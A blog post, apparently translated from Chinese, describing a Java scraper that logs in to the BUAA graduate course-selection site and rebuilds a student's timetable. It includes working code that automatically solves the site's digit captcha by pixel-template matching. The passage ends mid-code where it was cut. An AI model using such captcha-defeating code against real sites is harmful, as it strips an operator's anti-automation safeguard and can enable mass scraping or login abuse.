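I spent a day and a half scraping my course timetable from the academic-affairs website, and tonight, while playing around with git, I accidentally deleted it. Utterly stupid. On the BUAA academic-affairs site you pick courses by clicking radio buttons, and the result is never shown to you as a timetable. So this system simulates a login, fetches the pages, parses the courses with jsoup, and displays them in a nicer form. The login module cracks the captcha: you only enter your user id and password, the captcha is filled in automatically, and submitting the form logs you in. But I have deleted that code, so tomorrow I will restore it.
Whereupon I sighed. As the ancients once said: never use rm unless you know exactly what you are doing. When you are tired, never perform dangerous operations. What counts as dangerous? Deleting, modifying, any write that cannot be undone. I was deleting A, believing it would achieve goal A, and deleted B instead. This is not my first or second accidental deletion; I must learn the lesson and use rm with great care.
Euler saw most of his writings burn in a great fire, and still he started over. My insignificant little program I can rewrite from memory in half an hour.
========= Project details below =========
1. Project dependencies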
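dependencies {
    // `compile` is the configuration name of that Gradle era; Gradle 7+ removed it in favour of `implementation`
    compile group: 'org.apache.httpcomponents', name: 'httpclient', version: '4.5.2'
    compile group: 'org.jsoup', name: 'jsoup', version: '1.9.2'
}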
HttpClient handles the network requests and jsoup parses the HTML.
2. Data structures
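// Course.java
import java.util.List;

public class Course {
    String name;                        // course name
    List<CourseClass> courseClassList;  // all weekly sessions of this course
    double score;                       // credit value shown on the page
}

// CourseClass.java
public class CourseClass {
    int week;        // day of the week, 1-7
    int time;        // slot number within the day
    String address;  // classroom
    Course course;   // back-reference to the owning course
}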
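Course and CourseClass are in a one-to-many relationship: a course meets several times, and each meeting has its own time and place. So Course holds a courseClassList with its meeting times and places, and so that a CourseClass can reach the details of its course, CourseClass has a Course field. This forms a reference cycle that lets you navigate in either direction. Getters and setters are omitted from the code above.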
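With a cycle like this, both directions must be set by hand, and forgetting the back-reference is an easy mistake. A minimal sketch, assuming you want to make that mistake impossible: a hypothetical `addClass` helper that creates a session and wires its back-reference in one step. The class and method names are illustrative and not part of the project.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical variant of Course/CourseClass that keeps both sides of the cycle consistent.
public class CourseLinkDemo {
    static class Course {
        final String name;
        final double score;
        final List<CourseClass> courseClassList = new ArrayList<>();

        Course(String name, double score) {
            this.name = name;
            this.score = score;
        }

        // Creates a session that already points back at this course, then records it here.
        CourseClass addClass(int week, int time, String address) {
            CourseClass cc = new CourseClass(week, time, address, this);
            courseClassList.add(cc);
            return cc;
        }
    }

    static class CourseClass {
        final int week;
        final int time;
        final String address;
        final Course course; // set once in the constructor, never null

        CourseClass(int week, int time, String address, Course course) {
            this.week = week;
            this.time = time;
            this.address = address;
            this.course = course;
        }
    }
}
```

Because `course` is final and only `addClass` constructs sessions, a session can never end up in one course's list while pointing at another.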
3. Logging in to the BUAA graduate site
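// SyllabusGetter.java (excerpt): imports used by login()
import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;

import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

// method of SyllabusGetter
public boolean login(String userId, String password, HttpClient client) throws IOException {
    // Step 1: visit the login page so the server prepares a captcha for this session
    String login = "http://gsmis.graduate.buaa.edu.cn/gsmis/main.do";
    String img = "http://gsmis.graduate.buaa.edu.cn/gsmis/Image.do";
    HttpEntity entity = client.execute(new HttpGet(login)).getEntity();
    EntityUtils.consume(entity);

    // Step 2: download this session's captcha image and decode it
    HttpEntity imgEntity = client.execute(new HttpGet(img)).getEntity();
    String checkCode = new Decoder(imgEntity.getContent()).ans;
    EntityUtils.consume(imgEntity);

    // Step 3: submit user id, password and captcha
    String form = "http://gsmis.graduate.buaa.edu.cn/gsmis/indexAction.do";
    HttpPost formPost = new HttpPost(form);
    List<NameValuePair> formList = new ArrayList<>();
    formList.add(new BasicNameValuePair("id", userId));
    formList.add(new BasicNameValuePair("password", password));
    formList.add(new BasicNameValuePair("checkcode", checkCode));
    formPost.setEntity(new UrlEncodedFormEntity(formList));
    HttpEntity indexEntity = client.execute(formPost).getEntity();
    String indexStr = EntityUtils.toString(indexEntity); // toString() also consumes the entity

    // The index page contains "当前用户" ("current user") only after a successful login
    return indexStr.contains("当前用户");
}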
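Captcha cracking is explained further below; this part focuses on the sequence of requests.
Step 1: GET the login page. This tells the server "I'm here, give me a captcha." The server generates a random string s and stores it in the session for the later check, then calls its image generator to draw s into a picture. As far as I can tell, the image link is kept in the session as well, so when I request http://gsmis.graduate.buaa.edu.cn/gsmis/Image.do the server takes the link out of the session and hands me the image.
So if you request the image URL directly, without loading the login page first, you get a different image every time: the captcha s and the image link are only stored in the session after the login page has been visited.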
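The session mechanics described above can be sketched as a toy in-memory model. This is a hypothetical illustration that follows the description in the text, not the gsmis server's code; the class and method names only mirror the three URLs.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Random;

// Hypothetical toy model of a session-bound captcha, following the description above.
public class CaptchaSessionDemo {
    private final Map<String, String> codeBySession = new HashMap<>();
    private final Random random;

    public CaptchaSessionDemo(long seed) {
        this.random = new Random(seed);
    }

    private String randomCode() {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < 4; i++) {
            sb.append(1 + random.nextInt(9)); // digits 1-9, as in the real captcha
        }
        return sb.toString();
    }

    // like GET main.do: create the code s and remember it in this session
    public void visitLoginPage(String sessionId) {
        codeBySession.put(sessionId, randomCode());
    }

    // like GET Image.do: "draw" the code stored in this session (here: return it as text)
    public String fetchImage(String sessionId) {
        String code = codeBySession.get(sessionId);
        // nothing stored yet: a fresh random code on every call, which never validates
        return code != null ? code : randomCode();
    }

    // like POST indexAction.do: the captcha only counts if it matches this session's code
    public boolean submit(String sessionId, String checkCode) {
        String expected = codeBySession.get(sessionId);
        return expected != null && expected.equals(checkCode);
    }
}
```

In this model the session id plays the role of the cookie: if the three requests came from clients with different cookie jars, `submit` would find no stored code and reject even a correctly read captcha.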
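Technically, every request you execute returns an HttpEntity, and that entity must be consumed, for example with EntityUtils.consume(HttpEntity). If it is not consumed, the underlying connection and related resources are not released.
Step 2: GET the captcha URL. When the image URL is requested, the server looks up the session, finds the real image, and returns its content.
Step 3: after decoding the captcha, POST the user id, password, and captcha to the form's target URL. The server takes s out of the session and checks the captcha; if it is correct, it then checks whether the user id and password match.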
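The POST in step 3 carries an `application/x-www-form-urlencoded` body built from the three fields `id`, `password` and `checkcode`. A minimal sketch of what such a body looks like, using only the JDK (Java 10+ for `URLEncoder.encode(String, Charset)`); the class name is hypothetical and UTF-8 is an assumption, not something the site is known to require.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.StringJoiner;

// Hypothetical helper showing the url-encoded body of the login POST.
public class FormBodyDemo {
    // Encodes each name and value and joins the pairs as name=value&name=value
    public static String encode(Map<String, String> fields) {
        StringJoiner body = new StringJoiner("&");
        for (Map.Entry<String, String> e : fields.entrySet()) {
            body.add(URLEncoder.encode(e.getKey(), StandardCharsets.UTF_8)
                    + "=" + URLEncoder.encode(e.getValue(), StandardCharsets.UTF_8));
        }
        return body.toString();
    }

    // The three fields named in login(): id, password, checkcode
    public static String loginBody(String id, String password, String checkCode) {
        Map<String, String> fields = new LinkedHashMap<>(); // keeps the insertion order
        fields.put("id", id);
        fields.put("password", password);
        fields.put("checkcode", checkCode);
        return encode(fields);
    }
}
```

For example, `loginBody("demoUser", "demo pass", "1234")` yields `id=demoUser&password=demo+pass&checkcode=1234`: spaces become `+` and reserved characters such as `&` are percent-encoded, which is the form encoding HttpClient's form entity also produces.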
4. Fetching the course-selection pages
public List<CourseClass> getSyllabus(String userId, String password) throws IOException {
    if (!login(userId, password, client)) {
        throw new IOException("login failed for " + userId);
    }

    // toModule must be visited first and its entity consumed, otherwise the required-course page is not reachable
    String toModule = "http://gsmis.graduate.buaa.edu.cn/gsmis/toModule.do?prefix=/py&page=/pySelectCourses.do?do=xsXuanKe";
    HttpResponse toModuleResp = client.execute(new HttpGet(toModule));
    EntityUtils.consume(toModuleResp.getEntity());

    // Collects the course sessions found on all of the pages below
    List<CourseClass> courseClassList = new ArrayList<>();

    // Required courses (bixiu): fetch the page and parse it with jsoup
    String bixiu = "http://gsmis.graduate.buaa.edu.cn/gsmis/py/pySelectCourses.do?do=xuanBiXiuKe";
    HttpEntity bixiuEntity = client.execute(new HttpGet(bixiu)).getEntity();
    String bixiuHtml = EntityUtils.toString(bixiuEntity);
    courseClassList.addAll(parse(bixiuHtml));

    // Lab and seminar courses (zhuanti): there are three categories, one POST request each
    String zhuanti = "http://gsmis.graduate.buaa.edu.cn/gsmis/py/pySylJsAction.do";
    for (String zhuantiType : new String[]{"001900", "001700", "000900"}) {
        List<NameValuePair> zhuantiForm = new ArrayList<>();
        zhuantiForm.add(new BasicNameValuePair("sydl", zhuantiType));
        HttpPost zhuantiPost = new HttpPost(zhuanti);
        zhuantiPost.setEntity(new UrlEncodedFormEntity(zhuantiForm));
        HttpEntity zhuantiEntity = client.execute(zhuantiPost).getEntity();
        String zhuantiHtml = EntityUtils.toString(zhuantiEntity);
        courseClassList.addAll(parse(zhuantiHtml));
    }
    sortAndShow(courseClassList);
    return courseClassList;
}
getSyllabus() takes a user id and a password and returns a List<CourseClass>, the list of class sessions, parsing the pages with jsoup along the way. It lives in SyllabusGetter.java and uses this field of SyllabusGetter:
HttpClient client = HttpClients.createDefault();
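Reusing this one `client` is what keeps the login, the captcha and the later page requests in the same server-side session: the client built by `HttpClients.createDefault()` keeps cookies in an in-memory cookie store. For comparison, a sketch with the JDK 11+ `java.net.http.HttpClient`, which only keeps cookies when it is given a `CookieHandler`; the class name is hypothetical and this is not what the project uses.

```java
import java.net.CookieManager;
import java.net.CookiePolicy;
import java.net.http.HttpClient;

// Hypothetical JDK 11+ counterpart of the shared `client` field.
public class SharedClientDemo {
    // One client with one cookie jar means one server-side session for every request it sends.
    public static HttpClient newSessionClient() {
        // null store = the default in-memory CookieStore
        CookieManager cookies = new CookieManager(null, CookiePolicy.ACCEPT_ALL);
        return HttpClient.newBuilder()
                .cookieHandler(cookies)
                .build();
    }
}
```

Creating a new client per request would give every request an empty cookie jar, so the captcha would no longer belong to the session that submits the form.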
5. Parsing the pages
// imports used by the parsing code
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Parses the HTML and returns the sessions of every course that is already selected
List<CourseClass> parse(String html) {
    List<CourseClass> ans = new ArrayList<>();
    Document doc = Jsoup.parse(html);
    // A selected course is a table row whose input element is checked
    for (Element input : doc.select("input[checked]")) {
        Element tr = input.parent().parent();
        Elements tds = tr.select("td");
        String[] timeAddresses = tds.get(1).text().split(" ");
        String name = tds.get(4).text();
        String score = tds.get(7).text();

        Course course = new Course();
        course.setName(name.substring(0, name.indexOf("--")));
        course.setScore(Double.parseDouble(score));
        List<CourseClass> list = new ArrayList<>();
        for (String timeAddress : timeAddresses) {
            if (timeAddress.isEmpty()) continue;
            for (CourseClass cc : parseTimeAddress(timeAddress)) {
                cc.setCourse(course);
                list.add(cc);
            }
        }
        course.setCourseClassList(list);
        ans.addAll(list);
    }
    return ans;
}

// Some entries span several periods, so a List<CourseClass> is returned instead of a single CourseClass
List<CourseClass> parseTimeAddress(String s) {
    List<CourseClass> ans = new ArrayList<>();
    String[] ss = s.split(",");
    int week = ss[0].charAt(1) - '0';                        // day of the week
    Matcher m = Pattern.compile("\\d+~\\d+").matcher(ss[0]); // period range such as 5~8
    if (!m.find()) throw new IllegalArgumentException("no period range in: " + s);
    String[] time = m.group().split("~");
    int start = Integer.parseInt(time[0]), end = Integer.parseInt(time[1]);
    String address = ss[1].substring(5, ss[1].length() - 1);

    CourseClass courseClass = new CourseClass();
    courseClass.setTime(start / 2 + 1);   // periods 1-2 -> slot 1, 3-4 -> slot 2, ...
    courseClass.setWeek(week);
    courseClass.setAddress(address);
    ans.add(courseClass);
    if (end - start == 3) {               // four periods also occupy the next slot
        CourseClass courseClass1 = new CourseClass();
        courseClass1.setTime(start / 2 + 2);
        courseClass1.setWeek(week);
        courseClass1.setAddress(address);
        ans.add(courseClass1);
    }
    return ans;
}

// Sorts by day, then by slot, and prints the timetable
void sortAndShow(List<CourseClass> courseClassList) {
    courseClassList.sort(Comparator.comparingInt(CourseClass::getWeek)
            .thenComparingInt(CourseClass::getTime));
    courseClassList.forEach(i -> System.out.printf("Day %d, slot %d, at %s: %s%n",
            i.getWeek(), i.getTime(), i.getAddress(), i.getCourse().getName()));
}
Parsing the pages is pure string processing; a few rounds of trial and error are enough to get it working.
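The one piece of arithmetic in that string processing is turning a period range into timetable slots: periods 1-2 are slot 1, 3-4 slot 2, and so on, and a four-period entry fills two slots. A small sketch of just that step, assuming (as parseTimeAddress does) that periods come in pairs starting at an odd number; it generalizes the "4 periods means a second slot" special case to any even-length range. The class and method names are hypothetical, and it uses `\d+` rather than `\d*` so a lone `~` cannot match.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper: period range "start~end" -> list of slot numbers.
public class PeriodSlotDemo {
    private static final Pattern RANGE = Pattern.compile("(\\d+)~(\\d+)");

    public static List<Integer> slots(String text) {
        Matcher m = RANGE.matcher(text);
        if (!m.find()) throw new IllegalArgumentException("no period range in: " + text);
        int start = Integer.parseInt(m.group(1));
        int end = Integer.parseInt(m.group(2));
        List<Integer> result = new ArrayList<>();
        // every pair of periods (p, p + 1) is one slot: 1-2 -> 1, 3-4 -> 2, 5-6 -> 3, ...
        for (int p = start; p <= end; p += 2) {
            result.add(p / 2 + 1);
        }
        return result;
    }
}
```

`slots("5~8")` gives `[3, 4]`, the same two slots parseTimeAddress produces with `start / 2 + 1` and `start / 2 + 2`.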
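6. Cracking the captcha
The captcha in this project is even simpler than the one on the 东大 (Dongda) academic-affairs site, and recognition is 100% accurate. It uses only the nine characters 1-9, and, as on the Dongda site, they are drawn upright and undistorted. So the whole procedure is the same as before.
The captcha image is a 50×20 matrix of pixel colours with four character positions. In a code such as "1111" the four 1s are always exactly 9 pixels apart horizontally, and the same holds for "2222", "3333" and so on. So for each character we only need to record two things: its position and its shape.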
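Written as a formula, assuming (as described above) that only the horizontal position changes between the four slots: if a character's shape is stored as an anchor $(x_0, y_0)$ for slot 0 plus offsets $(\Delta x_k, \Delta y_k)$, with $(\Delta x_0, \Delta y_0) = (0, 0)$ for the anchor itself, then its $k$-th pixel in slot $i$ lies at

$$
(x,\ y) = \left(x_0 + \Delta x_k + 9i,\ \ y_0 + \Delta y_k\right), \qquad i \in \{0, 1, 2, 3\}.
$$

For example, an anchor at $(6, 8)$ lands at $(6 + 9 \times 2,\ 8) = (24, 8)$ in the third slot ($i = 2$).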
First, download a batch of captcha images as raw material for the analysis.
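import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.HttpClients;

import java.io.IOException;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

// Downloads 10 sample captchas into src/main/resources/checkcodes
public class ImageDownloader {
    static HttpClient client = HttpClients.createDefault();

    public static void main(String[] args) throws IOException {
        HttpGet get = new HttpGet("http://gsmis.graduate.buaa.edu.cn/gsmis/Image.do");
        Path folder = Paths.get("src/main/resources/checkcodes");
        Files.createDirectories(folder); // does nothing if the folder already exists
        for (int i = 0; i < 10; i++) {
            // each request returns a new random captcha
            try (OutputStream out = Files.newOutputStream(folder.resolve(i + ".jpg"))) {
                client.execute(get).getEntity().writeTo(out); // writeTo reads the whole entity
            }
        }
    }
}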
Next, select each character's point set by clicking on its pixels, which produces data.txt:
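import javax.imageio.ImageIO;
import javax.swing.*;
import java.awt.BorderLayout;
import java.awt.Color; // a single-type import takes precedence over any same-named class in this package
import java.awt.Graphics;
import java.awt.Point;
import java.awt.event.KeyAdapter;
import java.awt.event.KeyEvent;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.awt.image.BufferedImage;
import java.io.File;
import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Labelling tool: shows one captcha enlarged; left-click marks a pixel, right-click unmarks it.
// Type the digit into the text field and press Enter to store the marked pixels,
// Ctrl+S writes data.txt, Up/Down switch between images.
public class DataGenerator extends JFrame {
    public static void main(String[] args) {
        new DataGenerator();
    }

    JTextField text = new JTextField();
    JPanel panel = new JPanel() {
        @Override
        public void paint(Graphics g) {
            try {
                BufferedImage img = ImageIO.read(files[fileIndex]);
                if (chosen == null) chosen = new boolean[img.getWidth()][img.getHeight()];
                // paint the marked pixels red
                for (int i = 0; i < img.getWidth(); i++) {
                    for (int j = 0; j < img.getHeight(); j++) {
                        if (chosen[i][j]) img.setRGB(i, j, Color.RED.getRGB());
                    }
                }
                g.drawImage(img, 0, 0, getWidth(), getHeight(), null);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    };
    File[] files = new File("src/main/resources/checkcodes").listFiles();
    int fileIndex = 0;
    int interval = 9;
    boolean[][] chosen;                               // chosen[x][y]: pixel belongs to the glyph
    Map<Integer, List<Point>> ans = new HashMap<>();

    DataGenerator() {
        Map<Integer, List<Point>> loaded = DataManager.load();
        if (loaded != null) ans = loaded;             // load() returns null when data.txt does not exist yet
        setExtendedState(JFrame.MAXIMIZED_BOTH);
        setLayout(new BorderLayout());
        add(text, BorderLayout.NORTH);
        add(panel, BorderLayout.CENTER);
        setVisible(true);
        setDefaultCloseOperation(EXIT_ON_CLOSE);

        panel.addKeyListener(new KeyAdapter() {
            @Override
            public void keyPressed(KeyEvent e) {
                if (e.getKeyCode() == KeyEvent.VK_DOWN) {
                    fileIndex = (fileIndex + 1) % files.length;
                    chosen = null;
                    panel.repaint();
                } else if (e.getKeyCode() == KeyEvent.VK_UP) {
                    fileIndex = (fileIndex - 1 + files.length) % files.length;
                    chosen = null;
                    panel.repaint();
                } else if (e.isControlDown() && e.getKeyCode() == KeyEvent.VK_S) {
                    DataManager.save(ans);
                }
            }
        });

        text.addKeyListener(new KeyAdapter() {
            @Override
            public void keyPressed(KeyEvent e) {
                if (e.getKeyCode() != KeyEvent.VK_ENTER) return;
                String s = text.getText();
                if (s.length() != 1 || s.charAt(0) < '1' || s.charAt(0) > '9') return;
                int n = Integer.parseInt(s);
                // Scan column by column: the first marked pixel (leftmost, then topmost) is stored
                // in absolute coordinates, every later one relative to it
                List<Point> ps = new ArrayList<>();
                for (int i = 0; i < chosen.length; i++) {
                    for (int j = 0; j < chosen[0].length; j++) {
                        if (!chosen[i][j]) continue;
                        if (ps.isEmpty()) ps.add(new Point(i, j));
                        else ps.add(new Point(i - ps.get(0).x, j - ps.get(0).y));
                    }
                }
                ans.put(n, ps);
                chosen = null;
                text.setText("");
                panel.repaint();
            }
        });

        panel.addMouseListener(new MouseAdapter() {
            @Override
            public void mouseClicked(MouseEvent e) {
                // convert the click from screen coordinates to image pixel coordinates
                double gridW = panel.getWidth() * 1.0 / chosen.length;
                double gridH = panel.getHeight() * 1.0 / chosen[0].length;
                int x = (int) (e.getX() / gridW), y = (int) (e.getY() / gridH);
                if (e.getButton() == MouseEvent.BUTTON1) {        // left click: mark
                    chosen[x][y] = true;
                    setTitle(x + " " + y);
                } else if (e.getButton() == MouseEvent.BUTTON3) { // right click: unmark
                    chosen[x][y] = false;
                }
                panel.repaint();
            }

            @Override
            public void mouseEntered(MouseEvent e) {
                panel.requestFocus(); // so the panel receives the arrow keys and Ctrl+S
            }
        });
    }
}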
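The two pieces of logic in the labelling tool, mapping a click on the stretched image back to a pixel and encoding the marked pixels as anchor plus relative offsets, can be pulled out and checked without a GUI. A minimal sketch with hypothetical names; the clamp in `toPixel` is an addition that is not in the tool above and guards against a click on the very last screen pixel.

```java
import java.awt.Point;
import java.util.ArrayList;
import java.util.List;

// Hypothetical, GUI-free version of DataGenerator's click mapping and shape encoding.
public class TemplateEncodingDemo {
    // Maps a click at panel coordinate `click` to an image pixel index, given that an image
    // `imagePixels` wide is stretched over `panelSize` screen pixels.
    public static int toPixel(int click, int panelSize, int imagePixels) {
        double cell = panelSize * 1.0 / imagePixels;
        return Math.min(imagePixels - 1, (int) (click / cell));
    }

    // Scans column by column (x outer, y inner), so the first hit is the leftmost, then topmost,
    // marked pixel; it is stored absolutely and every later pixel relative to it.
    public static List<Point> encode(boolean[][] chosen) {
        List<Point> ps = new ArrayList<>();
        for (int x = 0; x < chosen.length; x++) {
            for (int y = 0; y < chosen[0].length; y++) {
                if (!chosen[x][y]) continue;
                if (ps.isEmpty()) ps.add(new Point(x, y));
                else ps.add(new Point(x - ps.get(0).x, y - ps.get(0).y));
            }
        }
        return ps;
    }
}
```

Marking pixels (6, 8), (7, 7) and (8, 6) on a 50×20 grid encodes to `(6, 8), (1, -1), (2, -2)`, which is exactly how the line for digit 1 in data.txt begins.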
The resulting data.txt looks like this:
1 6 8 1 -1 2 -2 3 -3 3 -2 3 -1 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8
2 5 7 0 9 1 -1 1 8 1 9 2 -2 2 7 2 9 3 -2 3 6 3 9 4 -2 4 5 4 9 5 -2 5 -1 5 3 5 4 5 9 6 -1 6 0 6 1 6 2 6 3 6 9
3 5 6 0 1 0 8 1 -1 1 0 1 9 2 -1 2 4 2 10 3 -1 3 4 3 10 4 -1 4 0 4 3 4 4 4 10 5 0 5 1 5 2 5 5 5 9 6 6 6 7 6 8
4 4 12 0 1 1 -1 1 1 2 -3 2 -2 2 1 3 -4 3 -3 3 1 4 -5 4 1 5 -6 5 1 6 -7 6 -6 6 -5 6 -4 6 -3 6 -2 6 -1 6 0 6 1 6 2 6 3 6 4 7 1
5 5 8 0 1 0 2 0 6 1 -3 1 -2 1 -1 1 1 1 2 1 7 2 -3 2 1 2 8 3 -3 3 1 3 8 4 -3 4 1 4 8 5 -3 5 2 5 7 6 -3 6 3 6 4 6 5 6 6
6 5 7 0 1 0 2 0 3 0 4 0 5 0 6 0 7 1 -1 1 3 1 7 1 8 2 -2 2 2 2 9 3 -2 3 2 3 9 4 -2 4 2 4 9 5 -2 5 -1 5 3 5 8 6 -1 6 0 6 4 6 5 6 6 6 7
7 6 5 1 0 2 0 2 8 2 9 2 10 2 11 3 0 3 4 3 5 3 6 3 7 4 0 4 2 4 3 4 4 5 0 5 1
8 5 7 0 1 0 5 0 6 0 7 1 -1 1 2 1 4 1 8 2 -2 2 3 2 9 3 -2 3 3 3 9 4 -2 4 3 4 9 5 -2 5 -1 5 2 5 4 5 8 6 0 6 1 6 5 6 6 6 7
9 5 7 0 1 0 2 0 3 0 7 1 -1 1 4 1 8 2 -2 2 5 2 9 3 -2 3 5 3 9 4 -2 4 5 4 9 5 -1 5 4 5 8 6 0 6 1 6 2 6 3 6 4 6 5 6 6 6 7
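The first number on each line is the character itself. The next two numbers are the coordinates of its leftmost (and, among those, topmost) point when the character is in the first position. All remaining numbers on the line are coordinates relative to that point, i.e. the character's shape.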
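Putting the file format and the 9-pixel spacing together, one data.txt line can be turned into the absolute pixels a character would cover in any of the four positions. A small sketch with hypothetical names; it is a standalone illustration, not a method of the project's DataManager or Decoder.

```java
import java.awt.Point;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;

// Hypothetical helper: one data.txt line -> absolute pixels of that character in a given slot.
public class DataLineDemo {
    static final int INTERVAL = 9; // horizontal distance between character slots (from the text)

    // Parses e.g. "1 6 8 1 -1 2 -2" and returns the absolute coordinates of that character's
    // shape when it is drawn in slot `slot` (0..3).
    public static List<Point> pixelsInSlot(String line, int slot) {
        List<Point> pixels = new ArrayList<>();
        try (Scanner in = new Scanner(line)) {
            in.nextInt();                            // the character itself, not needed here
            int ax = in.nextInt() + slot * INTERVAL; // anchor shifted to the requested slot
            int ay = in.nextInt();
            pixels.add(new Point(ax, ay));           // the anchor pixel
            while (in.hasNextInt()) {
                int dx = in.nextInt();
                int dy = in.nextInt();
                pixels.add(new Point(ax + dx, ay + dy));
            }
        }
        return pixels;
    }
}
```

For `"1 6 8 1 -1 2 -2"` in slot 2 this yields (24, 8), (25, 7) and (26, 6).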
Reading and writing data.txt is handled by a small "manager" class dedicated to that file:
import java.awt.Point;
import java.io.File;
import java.io.IOException;
import java.io.PrintWriter;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Scanner;

// Reads and writes data.txt: one line per digit, "digit x0 y0 dx1 dy1 dx2 dy2 ..."
public class DataManager {
    static String filePath = "src/main/resources/data.txt";

    public static void save(Map<Integer, List<Point>> ans) {
        try (PrintWriter out = new PrintWriter(filePath)) {
            for (int i = 1; i < 10; i++) {
                if (ans.get(i) == null) continue;
                out.print(i);
                for (Point p : ans.get(i)) {
                    out.print(" " + p.x + " " + p.y);
                }
                out.println();
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // Returns null if data.txt cannot be read
    public static Map<Integer, List<Point>> load() {
        Map<Integer, List<Point>> ans = new HashMap<>();
        try (Scanner in = new Scanner(new File(filePath))) {
            while (in.hasNextLine()) {
                String line = in.nextLine().trim();
                if (line.isEmpty()) continue;
                Scanner tokens = new Scanner(line);
                int c = tokens.nextInt();
                List<Point> list = new ArrayList<>();
                while (tokens.hasNextInt()) {
                    int x = tokens.nextInt(), y = tokens.nextInt();
                    list.add(new Point(x, y));
                }
                ans.put(c, list);
            }
            return ans;
        } catch (IOException e) {
            e.printStackTrace();
            return null;
        }
    }
}
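With data.txt in place, recognition is template matching: for each candidate character, lay its point set over the current position, collect the colours under those points, and compute their variance. The smaller the variance, the more uniform the colours, i.e. the better the template lines up with the single-coloured glyph. The main decoding work is done in Decoder.java: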
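A standalone sketch of that scoring step, written without the project's colour class; the class and method names are hypothetical. `score` computes the per-channel variance E[X²] - E[X]² over the template's pixels and combines the three variances as a vector length, the quantity Decoder compares; `best` keeps the candidate with the smallest score. One assumption is built into the method: a template that falls entirely on flat background would also score near zero, so it relies on the glyph being the only uniformly coloured region the templates can cover.

```java
import java.awt.Point;
import java.awt.image.BufferedImage;
import java.util.List;
import java.util.Map;

// Hypothetical, self-contained version of the variance-based template score.
public class VarianceMatchDemo {
    // Per-channel variance of the colours under `pixels`, combined as sqrt(varR^2 + varG^2 + varB^2).
    public static double score(BufferedImage img, List<Point> pixels) {
        double[] sum = new double[3], sumSq = new double[3];
        for (Point p : pixels) {
            int rgb = img.getRGB(p.x, p.y);
            int[] ch = {(rgb >> 16) & 0xFF, (rgb >> 8) & 0xFF, rgb & 0xFF};
            for (int c = 0; c < 3; c++) {
                sum[c] += ch[c];
                sumSq[c] += (double) ch[c] * ch[c];
            }
        }
        double len2 = 0;
        for (int c = 0; c < 3; c++) {
            double mean = sum[c] / pixels.size();
            double var = sumSq[c] / pixels.size() - mean * mean; // E[X^2] - E[X]^2
            len2 += var * var;
        }
        return Math.sqrt(len2);
    }

    // Returns the key whose pixel set has the most uniform colours.
    public static int best(BufferedImage img, Map<Integer, List<Point>> candidates) {
        int bestKey = -1;
        double bestScore = Double.MAX_VALUE;
        for (Map.Entry<Integer, List<Point>> e : candidates.entrySet()) {
            double s = score(img, e.getValue());
            if (s < bestScore) {
                bestScore = s;
                bestKey = e.getKey();
            }
        }
        return bestKey;
    }
}
```

On a white image with a short black horizontal stroke, the template that follows the stroke scores 0, while one that crosses from the stroke into the background scores higher and loses.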
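import org.apache.http.HttpEntity;

import javax.imageio.ImageIO;
import java.awt.Point;
import java.awt.image.BufferedImage;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.List;
import java.util.Map;
import java.util.Scanner;

// A colour as a vector of three doubles. Named Rgb rather than Color so it does not
// clash with java.awt.Color, which the GUI tools use.
class Rgb {
    double r, g, b;

    Rgb(double r, double g, double b) {
        this.r = r;
        this.g = g;
        this.b = b;
    }

    // Unpacks a packed RGB int as returned by BufferedImage.getRGB
    Rgb(int x) {
        r = (x >> 16) & 255;
        g = (x >> 8) & 255;
        b = x & 255;
    }

    Rgb add(Rgb c) { return new Rgb(r + c.r, g + c.g, b + c.b); }
    Rgb sub(Rgb m) { return new Rgb(r - m.r, g - m.g, b - m.b); }
    Rgb mul() { return new Rgb(r * r, g * g, b * b); }            // component-wise square
    Rgb div(int size) { return new Rgb(r / size, g / size, b / size); }
    double len() { return Math.sqrt(r * r + g * g + b * b); }
}

public class Decoder {
    public String ans;                      // the decoded captcha
    int interval = 9;                       // horizontal distance between character positions
    public Map<Integer, List<Point>> data;

    void load() {
        data = DataManager.load();
    }

    // Recognises the four characters of a captcha image
    String go(BufferedImage img) {
        StringBuilder code = new StringBuilder();
        for (int i = 0; i < 4; i++) {
            int minC = 1;
            double minDx = Double.MAX_VALUE;
            for (int j = 1; j < 10; j++) {
                List<Point> s = data.get(j);
                Point anchor = s.get(0);
                Rgb m = new Rgb(0), n = new Rgb(0);   // sum of colours, sum of squared colours
                for (int k = 0; k < s.size(); k++) {
                    // s.get(0) is the anchor itself (offset 0,0); later entries are offsets from it
                    int dx = k == 0 ? 0 : s.get(k).x, dy = k == 0 ? 0 : s.get(k).y;
                    Rgb c = new Rgb(img.getRGB(anchor.x + dx + i * interval, anchor.y + dy));
                    m = m.add(c);
                    n = n.add(c.mul());
                }
                m = m.div(s.size());
                n = n.div(s.size());
                double nowDx = n.sub(m.mul()).len();   // per-channel variance E[X^2] - E[X]^2
                if (nowDx < minDx) {
                    minDx = nowDx;
                    minC = j;
                }
            }
            code.append(minC);
        }
        return code.toString();
    }

    public Decoder() {
        load();
    }

    // Decodes a captcha image read from a stream
    public Decoder(InputStream cin) {
        this();
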